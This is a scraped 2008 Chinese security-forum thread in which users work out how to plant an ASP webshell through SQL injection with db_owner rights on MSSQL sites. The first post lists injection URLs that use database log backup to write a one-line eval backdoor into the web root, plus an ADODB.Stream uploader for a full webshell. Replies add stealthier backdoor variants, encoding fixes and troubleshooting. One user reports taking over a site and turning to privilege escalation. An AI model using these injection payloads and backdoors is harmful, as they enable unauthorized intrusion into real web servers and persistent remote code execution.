[讨论]SQL注入dbowner权限拿webshell(页 1) - 技术交流 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

valen886 发表于 2008-7-21 00:14

[讨论]SQL注入dbowner权限拿webshell

[讨论]SQL注入dbowner权限拿webshell
议题作者：free2ndfree
信息来源：邪恶八进制信息安全团队（[url=http://www.eviloctal.com/]www.eviloctal.com[/url])
原始连接：[url=http://www.eviloctal.com/]www.eviloctal.com[/url]

SA权限的现在少了，对于菜鸟来说，拿个webshell真不容易呀！了解到dbowner权限可以拿webshell（经常盲注入时经常遇见dbowner权限）,我找了好多资料，哎，郁闷的狠就是找不到相关的动画，都是以文字的形式写出来的，在黑防找到一个动画还是给VIP用的。天无决人之路，还是看文章吧！

很快就找到了一个dbowner权限的注入点，用NBSI就够了，我就不多废话了。由于是菜鸟我不知道咋样判断web与数据库是否在同一服务器上（别骂我），但我觉得我找的这个网站是满足网上一些牛人说的条件的。

数据库：xxx
物理路径：d:\xxxxx\
注入点：[url=http://www.xx.com/show_Topic.asp?T_id=436]http://www.xx.com/show_Topic.asp?T_id=436[/url]  数字型

1 [url=http://www.xx.com/show_Topic.asp?T_id=436;alter]http://www.xx.com/show_Topic.asp?T_id=436;alter[/url] database xxx set RECOVERY FULL
2 [url=http://www.xx.com/show_Topic.asp?T_id=436;create]http://www.xx.com/show_Topic.asp?T_id=436;create[/url] table cmd (a image)--
3 [url=http://www.xx.com/show_Topic.asp?T_id=436;backup]http://www.xx.com/show_Topic.asp?T_id=436;backup[/url] log xxx to disk = 'c:\cmd' with init
4 [url=http://www.xx.com/show_Topic.asp?T_id=436;insert]http://www.xx.com/show_Topic.asp?T_id=436;insert[/url] into cmd (a) values ('<%Execute(request("l"))%>')--
5 [url=http://www.xx.com/show_Topic.asp?T_id=436;backup]http://www.xx.com/show_Topic.asp?T_id=436;backup[/url] log xxx to disk = 'd:\xxxxx\asa.asp'--
6 [url=http://www.xx.com/show_Topic.asp?T_id=436;drop]http://www.xx.com/show_Topic.asp?T_id=436;drop[/url] table cmd--

我一个一个提交，估计是有一句话马诞生了，我访问[url=http://www.xx.com/asa.asp]http://www.xx.com/asa.asp[/url],是乱码！
难道是我提交成功了？接下来就不知道该咋办了，废话肯定用客户端连接，有人说。
<%Execute(request("l"))%>我以前没用过这个一句话马，不知道用哪个连接。结果我把上面的一句话马换成了海洋的一句话，可惜就是提交不成功估计是太长了吧。幸运呀，作夜12点了，我到论坛发贴问了一下，一个管理员说用：  一话后门提交.htm  里面的内容：
------------------------------------------------------------------------------------------------------------
                           一句话后门提交

表单提交地址:  http://
----------------------------------------------------------
set iP=server.createObject("Adodb.Stream")
iP.Open
iP.Type=2
iP.CharSet="gb2312"
iP.writetext request("aoyun")
iP.SaveToFile server.mappath("aoyunwan.asp"),2
iP.Close
set iP=nothing
response.redirect "aoyunwan.asp"
-----------------------------------------------------------
添入生成木马的内容
本提交页面所对应的服务端为 <%execute request("aoyunwan")%> ,可自行修改

------------------------------------------------------------------------------------------------------------
看来论坛上的人还是负责滴，把下载地址都贴了出来了。没办法太菜了，我在“添入。。。。。。，可自行修改”那里添了海洋顶端。把地址写上[url=http://www.xx.com/asa.asp]http://www.xx.com/asa.asp[/url]，直接提交，其他的没有修改，结果还是乱码！
写这个帖子主要是想搞清楚：
1 我访问一句话马，咋样知道是否写入了？是否成功了？页面情况是个啥？（我上面返回的是乱码）
2 咋样判断数据库与web在同一服务器上（难道是靠经验）？
3 就是那个一句话木马连接客户端，在提交时有啥要修改的？当然了<%Execute(request("l"))%>中的l是密码我还是知道滴。我在海洋顶端里也把#换成了l,不知道其他的用修改哪里。

最后我再占用邪八一点空间（奸笑中。。）：难道dbowner拿webshell是秘诀，就是找不到相关的动画，也许高手现在已经不做动画了吧！还是慢慢等吧！也不知道写了半个多小时的帖子啥时候能通过审核。



[s:39]  [s:38]
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=127872&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=127872&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]

[url=http://forum.eviloctal.com/space-uid-31189.html]寂寞宝贝[/url] [img]http://forum.eviloctal.com/customavatars/31189.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

枝囡发表于 2008-7-21 00:14

一般写入成功后在最下面会有像SQL注入时的提示,VB那控件错误什么的,还有你在用NB的CMD写马的时候要注意转义的问题!有些符号会被转义掉!比如%>!成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=968234&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子428 精华[url=http://forum.eviloctal.com/digest.php?authorid=31189]12[/url] 积分4620 阅读权限100 性别男来自云南在线时间172 小时注册时间2006-2-7 最后登录2008-7-16 [url=http://hi.baidu.com/isbx/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=31189]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50027&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50027&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日，预测咨询，公司改名，权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

fulu 发表于 2008-7-21 00:14

3楼的兄弟！我是用IE直接提交的！

等吧！等等高手来！哎！
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50031&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50031&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]

[url=http://forum.eviloctal.com/space-uid-2811.html]hack520[/url] [img]http://forum.eviloctal.com/customavatars/2811.jpg[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

阿豪发表于 2008-7-21 00:14

楼猪参考下这个 [url=http://hack520.77169.com/archives/2005/29382.html]http://hack520.77169.com/archives/2005/29382.html[/url]

一样的道理，log 备份也一样

insert into cmd (a) values ('<%Execute(request("l"))%>')-- 改为
insert into cmd (a) values ('<%25Execute(request("l"))%25>')--Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华[url=http://forum.eviloctal.com/digest.php?authorid=2811]6[/url] 积分5597 阅读权限150 性别男在线时间576 小时注册时间2005-3-18 最后登录2008-7-2 [url=http://www.hack520.net]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2811]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50038&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50038&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-1385.html]十二少[/url] [img]http://forum.eviloctal.com/images/avatars/pw/univer4.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

brabrabra 发表于 2008-7-21 00:14

<%Execute(request("l"))% 这个一句话的不好使啊

  我测试了N次都没成功，手工，傻瓜工具都试了，成功插入这个后门，就是不能用客户端写入大马

  不是什么权限的问题，以前用KKER写的那个ASP的数据库生成马的ASP客户端成功过一次。Welcome to Http://Www.TwelveS.Cn
帖子126 精华[url=http://forum.eviloctal.com/digest.php?authorid=1385]0[/url] 积分3414 阅读权限100 性别男在线时间115 小时注册时间2005-1-8 最后登录2008-5-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1385]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50055&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50055&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘（图）[/url]

[url=http://forum.eviloctal.com/space-uid-26447.html]heroooooo[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

下眩月 发表于 2008-7-21 00:14

楼上的我怀疑你的水准,你要是知道些asp的知识,你就不会这么说了,这个一句话的功能是不用怀疑的,关键是你的客户端的提交的字符中有的地方要做相应的修改,大家都明白,我就不多说了,一个简单的客户端就行了,怕麻烦的话,就下载一个,用txt 查看一下有没有什么别的东东.不怕麻烦的话,就自己写一个,也就那么几句话.你写入不成功的可能性有很多:
1,你的客户端的一个字符有问题
2.fso
3.该目录没有写权限
ps:你插入一句话的时候要插好一点,否则熟悉搞站的一眼就看出这个站有点问题的,你的webshell就有很大的可能性要被干了,呵呵..
一般这么插入就可以了:
<%if request("|")<>"" then execute request("|")%>
原因不用我多说,都明白.
[url=http://wpa.qq.com/msgrd?V=1&Uin=451461449&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子54 精华[url=http://forum.eviloctal.com/digest.php?authorid=26447]0[/url] 积分2994 阅读权限100 性别男来自山东在线时间17 小时注册时间2006-1-8 最后登录2008-6-27 [url=http://heroooooo.ys168.com]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=26447]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50057&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50057&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日，预测咨询，公司改名，权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

邮差发表于 2008-7-21 00:14

<%if request("|")<>"" then execute request("|")%>
楼上的你用这句话成功过？

“关键是你的客户端的提交的字符中有的地方要做相应的修改,大家都明白,我就不多说了,一个简单的客户端就行了”不知道地方就在这里，不知道该修改哪里呀！
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50060&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50060&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-26447.html]heroooooo[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

hailar 发表于 2008-7-21 00:14

修改的地方就是你文本框中的value的值,就是<%if request("|")<>"" then execute request("|")%>中的"|",将name=|即可.当你将request的值修改了之后,value的值就要做相应的修改.注意有两个文本框,知道修改哪一个吧??
为什么要我说得这么明白呢??大多数的人都知道了..
[url=http://wpa.qq.com/msgrd?V=1&Uin=451461449&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子54 精华[url=http://forum.eviloctal.com/digest.php?authorid=26447]0[/url] 积分2994 阅读权限100 性别男来自山东在线时间17 小时注册时间2006-1-8 最后登录2008-6-27 [url=http://heroooooo.ys168.com]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=26447]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50068&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50068&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

wojoo 发表于 2008-7-21 00:14

"为什么要我说得这么明白呢??大多数的人都知道了.."
我们都是一些对ASP不太熟悉的菜鸟，如果知道ASP方面的知识多的话，就明白了！
还是感谢楼上的！ [s:70]
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50098&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50098&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-21571.html]tsjmarco[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

paul 发表于 2008-7-21 00:14

我总是备份不成功。。
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=21571]0[/url] 积分51 阅读权限40 性别男在线时间16 小时注册时间2005-12-8 最后登录2007-11-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=21571]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50528&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50528&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

dongdg 发表于 2008-7-21 00:14

我看了hack520大哥的那篇文章，用苯酚log成功了，用的一句话是<%Execute(request("free2ndfree"))%>
我访问[url=http://www.xx.com/1.asp]http://www.xx.com/1.asp[/url] 因为出现了
--------------------------------------------
Microsoft VBScript 运行时错误错误 '800a000d'

类型不匹配: 'execute'

/1.asp，行 120
------------------------------------------------------------------------
这样的提示，估计是成功了。
接着我用一句话提交页面进行提交,里面的内容我做了相应的修改

一句话后门提交

表单提交地址: [url=http://www.xx.com/1.asp]http://www.xx.com/1.asp[/url]
----------------------------------------------------------
set iP=server.createObject("Adodb.Stream")
iP.Open
iP.Type=2
iP.CharSet="gb2312"
iP.writetext request("free2ndfree")
iP.SaveToFile server.mappath("free2ndfree.asp"),2
iP.Close
set iP=nothing
response.redirect "free2ndfree.asp"
-----------------------------------------------------------
添入生成木马的内容
----------------------------------------------------------------------------------------------
我本以为提交后返回的页面是[url=http://www.xx.com/free2ndfree.asp]http://www.xx.com/free2ndfree.asp[/url]（我的大马）
结果浏览器又返回了[url=http://www.xx.com/1.asp]http://www.xx.com/1.asp[/url] 我很郁闷，！！！
难道是我的一句话后门提交页面的内容修改错了？？？ [s:55]
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50579&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50579&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40539.html]free2ndfree[/url] [img]http://forum.eviloctal.com/images/avatars/pw/stars2.gif[/img]
晶莹剔透§烈日灼然

小鱼儿 发表于 2008-7-21 00:14

[s:59] [s:59] 在各位大哥的帮忙下，webshell已经成功拿到了！

接下来就是提权了！！感谢hack520,heroooooo等等的人！
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=40539]2[/url] 积分104 阅读权限40 性别男在线时间18 小时注册时间2006-3-22 最后登录2008-6-8 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40539]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=50663&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=50663&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-9261.html]lei1180[/url] [img]http://forum.eviloctal.com/images/avatars/pw/female3.gif[/img]
晶莹剔透§烈日灼然

夏の雪 发表于 2008-7-21 00:14

Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/adimg/1.asp，行 9765

鑮zB搵?\縔~?md疁H?鈚TW栋?I鐂BBD縃>N?M

不是说缺少结束字符就是上面的错误！哪位帮我解决下菜鸟一只
[url=http://wpa.qq.com/msgrd?V=1&Uin=462554&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=9261]0[/url] 积分38 阅读权限40 性别男来自广东在线时间31 小时注册时间2005-8-10 最后登录2008-7-1 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=9261]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=57246&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=57246&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-66979.html]anwell[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

蚊少发表于 2008-7-21 00:14

alter database [XXX] set RECOVERY FULL

服务器: 消息 5011，级别 14，状态 2，行 1
用户没有更改数据库 '[XXX] ' 的权限。
服务器: 消息 5069，级别 16，状态 1，行 1
ALTER DATABASE 语句失败。
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=66979]0[/url] 积分9 阅读权限40 性别男在线时间0 小时注册时间2006-10-16 最后登录2006-10-16 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66979]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=69964&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=69964&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-66411.html]hackest[/url] [img]http://forum.eviloctal.com/customavatars/66411.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img]

穷疯了 发表于 2008-7-21 00:14

<%if request("cmd")<>"" then execute request("pass")%>这句绝对可以成功连接，而且写入的页面也不会出错，DB权限的偶成功过N次了，用lake2的客户端连接挺方便的！My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=297521327&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子882 精华[url=http://forum.eviloctal.com/digest.php?authorid=66411]20[/url] 积分5849 阅读权限150 性别男来自广东在线时间941 小时注册时间2006-10-12 最后登录2008-3-3 [url=http://www.hackest.cn/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66411]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=70593&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=70593&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-37126.html]sndqt[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix2.jpg[/img]
晶莹剔透§烈日灼然

彬彬有礼 发表于 2008-7-21 00:14

虽然网上都是DBO的提权的资料我和楼主一样没弄懂
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=37126]0[/url] 积分85 阅读权限40 在线时间3 小时注册时间2006-3-8 最后登录2008-5-5 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=37126]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=79712&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=79712&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-83572.html]黑色鼠标[/url] [img]http://forum.eviloctal.com/images/avatars/pw/mon2.gif[/img]
晶莹剔透§烈日灼然

btjily 发表于 2008-7-21 00:14

..都是强人...我落后啦.. [s:38]
[url=http://wpa.qq.com/msgrd?V=1&Uin=251656795&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=83572]0[/url] 积分6 阅读权限40 性别男在线时间0 小时注册时间2007-2-23 最后登录2007-2-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=83572]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=79741&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=79741&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40956.html]tonway[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

zhangrong 发表于 2008-7-21 00:14

长进了多谢大家的讨论
帖子4 精华[url=http://forum.eviloctal.com/digest.php?authorid=40956]0[/url] 积分10 阅读权限40 性别男在线时间9 小时注册时间2006-3-24 最后登录2008-7-10 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40956]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=79754&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=79754&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-70676.html]hzzlh[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

热带牛仔 发表于 2008-7-21 00:14

用数据库差异备份的，已经成功了，但是访问和连接的时候却是显示成这样，这是为什么呢？？

Microsoft VBScript 编译器错误错误 '800a0408'

无效字符

/nee/jzl.asp，行 881

I=-#?
-^
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=70676]0[/url] 积分38 阅读权限40 性别男在线时间44 小时注册时间2007-1-11 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70676]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=80362&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=80362&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-40731.html]hackloves[/url] [img]http://forum.eviloctal.com/images/avatars/pw/male1.gif[/img]
晶莹剔透§烈日灼然

土人发表于 2008-7-21 00:14

我的是PHP+MSSQL的数字型SA注入点，但会在每个单引号后面又加了个单引号，所以必须转换成16进制，执行到第三步，出现错误
[QUOTE]
Database error: Invalid SQL: SELECT m_title,m_author,m_source,m_content,convert(char(10),m_datetime,102) as m_datetime,m_picture,m_table,m_keyword FROM view_article WHERE m_id=48;backup log xxx to disk = ''c:\cmd'' with init--
MSSQL Error: 1 (General Error (The MSSQL interface cannot return detailed error messages).)
Session halted.
[/QUOTE]

;backup log xxx to disk = 'c:\cmd' with init-- ，将'c:\cmd'转换成16进制依然错误，高手指教下。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=453524604&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子26 精华[url=http://forum.eviloctal.com/digest.php?authorid=40731]0[/url] 积分87 阅读权限40 性别男在线时间46 小时注册时间2006-3-23 最后登录2008-7-14 [url=http://hi.baidu.com/xcrypt]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=40731]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=21784&repquote=80380&extra=page%3D4&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=21784&pid=80380&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-66712.html]19830821[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
